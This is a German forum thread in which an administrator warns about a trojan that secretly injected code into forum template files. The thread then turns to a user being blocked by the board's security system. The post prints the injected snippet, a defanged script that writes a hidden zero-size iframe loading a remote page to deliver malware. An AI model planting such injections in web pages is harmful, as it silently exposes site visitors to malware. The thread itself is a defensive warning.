unsere besten emails
Registrierung
Teammitglieder
Zur Startseite
Mitgliederliste
Suche
Kalender
Häufig gestellte Fragen
Zum Portal

Dedies-Board » Sicherheit » Anti-Virenboard » Unerwartete Folgen eines Trojanerbefalls » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Unerwartete Folgen eines Trojanerbefalls
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 21.299.213
Nächster Level: 22.308.442

1.009.229 Erfahrungspunkt(e) für den nächsten Levelanstieg

Unerwartete Folgen eines Trojanerbefalls Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Vor ein paar Tagen beklagte sich ein User in einem WBB-Hilfeforum das er Probleme mit seinem Forum nach dem Einbau eines Games hätte.

Beim posten eines Template-Codes des betreffenden Forums der den Fehler ausgelöst hatte sprang bei den meisten Usern die diesen Code zusehen bekamen der Viren Scanner an und warnte vor einem JavaScript-Virus.

Es stellte sich heraus das in dem Template und auch in einigen anderen Templates die zwecks des Einbaus des neuen Gamehacks von dem Rechner hochgeladen wurde ein Code mit eingefügt war der wiederum einen Trojaner runterladen sollte(URL wurde von mir editiert):

code:
1:
2:
3:
4:
5:
<!--c3284d--><sc[COLOR=red][B]<x>[/B][/COLOR]ript type="text/javascript">
document.write('<if[COLOR=red][B]<x>[/B][/COLOR]rame src="http://************.nl/joomla/images/news.php" border="0" width="0" height="0"></iframe>');
</script><!--/c3284d--> 



Dieser Code war ursprünglich nicht den Originaldateien enthalten sondern wurden durch den Trojaner "JS/expack" während des Bearbeitens/Entpacken der Dateien durch den User auf seinem Rechner eingefügt ohne das dieser davon was merkte.

Durch diese Art und Weise kann sich ein Trojaner wunderbar über Seiten die man normalerweise als "Sicher" einstufen würde problemlos weiterverbreiten.


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
31.12.2012 12:50 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de

Rene-gad Rene-gad ist männlich
Lebende Legende


images/avatars/avatar-181.jpg

Dabei seit: 15.08.2006
Beiträge: 244

Level: 39 [?]
Erfahrungspunkte: 1.631.541
Nächster Level: 1.757.916

126.375 Erfahrungspunkt(e) für den nächsten Levelanstieg

RE: Unerwartete Folgen eines Trojanerbefalls Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Hallo Dedie,
ich wünsche Dir und allen Boardies ein gesundes Neues Jahr!

Vllt. wegen dieses Code konnte ich heute aus meinem Büro nicht ins Forum reinkommen? Winken


__________________
Servus
Rene-gad

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Rene-gad: 02.01.2013 16:58.

02.01.2013 16:58 Rene-gad ist offline Beiträge von Rene-gad suchen Nehmen Sie Rene-gad in Ihre Freundesliste auf

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 21.299.213
Nächster Level: 22.308.442

1.009.229 Erfahrungspunkt(e) für den nächsten Levelanstieg

Themenstarter Thema begonnen von dedie
Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Hallo Rene-gad,
auch dir sei ein ein gesundes Neues Jahr gewünscht.

Ich habe mal den Code bei Virustotal hochgeladen da wurde nix angemeckert yes


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
02.01.2013 19:51 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de

Rene-gad Rene-gad ist männlich
Lebende Legende


images/avatars/avatar-181.jpg

Dabei seit: 15.08.2006
Beiträge: 244

Level: 39 [?]
Erfahrungspunkte: 1.631.541
Nächster Level: 1.757.916

126.375 Erfahrungspunkt(e) für den nächsten Levelanstieg

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Zitat:
Original von dedie
Ich habe mal den Code bei Virustotal hochgeladen da wurde nix angemeckert yes
Ich checke es morgen früh und gebe Dir alle Infos - gleich sofort, wenn es keine Probleme werden bzw. am Abend, wenn die Seite weiterhin geblockt werden sollte.


__________________
Servus
Rene-gad
02.01.2013 22:08 Rene-gad ist offline Beiträge von Rene-gad suchen Nehmen Sie Rene-gad in Ihre Freundesliste auf

Rene-gad Rene-gad ist männlich
Lebende Legende


images/avatars/avatar-181.jpg

Dabei seit: 15.08.2006
Beiträge: 244

Level: 39 [?]
Erfahrungspunkte: 1.631.541
Nächster Level: 1.757.916

126.375 Erfahrungspunkt(e) für den nächsten Levelanstieg

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Naja, es scheint doch was im Busch zu sein.
Siehe die Bilder an, das 2. Bild kommt von unserem Antivirus, das 3. - wenn ich die AV-Empfehlung ignoriere


Dateianhänge:
jpg Zwischenablage01.jpg (214,05 KB, 52 mal heruntergeladen)
jpg Zwischenablage02.jpg (213 KB, 52 mal heruntergeladen)
jpg Zwischenablage03.jpg (174 KB, 49 mal heruntergeladen)


__________________
Servus
Rene-gad

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Rene-gad: 03.01.2013 16:45.

03.01.2013 16:43 Rene-gad ist offline Beiträge von Rene-gad suchen Nehmen Sie Rene-gad in Ihre Freundesliste auf

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 21.299.213
Nächster Level: 22.308.442

1.009.229 Erfahrungspunkt(e) für den nächsten Levelanstieg

Themenstarter Thema begonnen von dedie
Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Das ist das neue Security-System vom Forum das hat was gegen deine IP oder so was in der Art, ich schau mal die Logs von dem System durch.

Edit: Um wie viel Uhr war das ungefähr?


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
03.01.2013 18:35 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de

Rene-gad Rene-gad ist männlich
Lebende Legende


images/avatars/avatar-181.jpg

Dabei seit: 15.08.2006
Beiträge: 244

Level: 39 [?]
Erfahrungspunkte: 1.631.541
Nächster Level: 1.757.916

126.375 Erfahrungspunkt(e) für den nächsten Levelanstieg

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Zitat:
Original von dedie
Um wie viel Uhr war das ungefähr?
So gegen 07:45 ...


__________________
Servus
Rene-gad
03.01.2013 19:47 Rene-gad ist offline Beiträge von Rene-gad suchen Nehmen Sie Rene-gad in Ihre Freundesliste auf

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 21.299.213
Nächster Level: 22.308.442

1.009.229 Erfahrungspunkt(e) für den nächsten Levelanstieg

Themenstarter Thema begonnen von dedie
Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Shit, heute morgen gegen 10:00 Uhr wurde die *.log Datei automatisch erneuert was davor war ist wech.

Ich stell mal ein wenig um, mal sehen ob es dann klappt.

Edit:
Heute morgen Ca. 7:45 Uhr erfolgte eine Blockierung die wahrscheinlich dich betraf, du kommst über Proxy rein das wurde geblockt.


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
03.01.2013 20:51 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de

Rene-gad Rene-gad ist männlich
Lebende Legende


images/avatars/avatar-181.jpg

Dabei seit: 15.08.2006
Beiträge: 244

Level: 39 [?]
Erfahrungspunkte: 1.631.541
Nächster Level: 1.757.916

126.375 Erfahrungspunkt(e) für den nächsten Levelanstieg

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Zitat:
Original von dedie
du kommst über Proxy rein
das stimmt, aber in meiner Firma immer ein Proxy dazwischen stand :).


__________________
Servus
Rene-gad
04.01.2013 13:03 Rene-gad ist offline Beiträge von Rene-gad suchen Nehmen Sie Rene-gad in Ihre Freundesliste auf

dedie dedie ist männlich
Administrator


images/avatars/avatar-188.jpg

Dabei seit: 04.03.2005
Beiträge: 2.952

Level: 54 [?]
Erfahrungspunkte: 21.299.213
Nächster Level: 22.308.442

1.009.229 Erfahrungspunkt(e) für den nächsten Levelanstieg

Themenstarter Thema begonnen von dedie
Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden   Zum Anfang der Seite springen

Seit 11 Tagen läuft hier im Forum ein neues Sicherheitssystem yes


__________________
Die Windows Systemwiederherstellung ist und war noch NIE ein geeignetes Mittel um einen Virus / Trojaner wieder los zu kriegen Augen rollen
04.01.2013 13:27 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Fügen Sie dedie in Ihre Kontaktliste ein Jabber Screennamen von dedie: dedie@jabber.ccc.de
Baumstruktur | Brettstruktur
Gehe zu:
Neues Thema erstellen Antwort erstellen
Dedies-Board » Sicherheit » Anti-Virenboard » Unerwartete Folgen eines Trojanerbefalls

Impressum|Boardregeln


secure-graphic.de
Board Blocks: 368.799 | Spy-/Malware: 5.599 | Bad Bot: 1.542 | Flooder: 281.746 | httpbl: 6.555
CT Security System 10.1.7 © 2006-2024 Security & GraphicArt

Ja, auch Dedies-Board verwendet Cookies. Hier erfahrt ihr alles zum Datenschutz
Verstanden;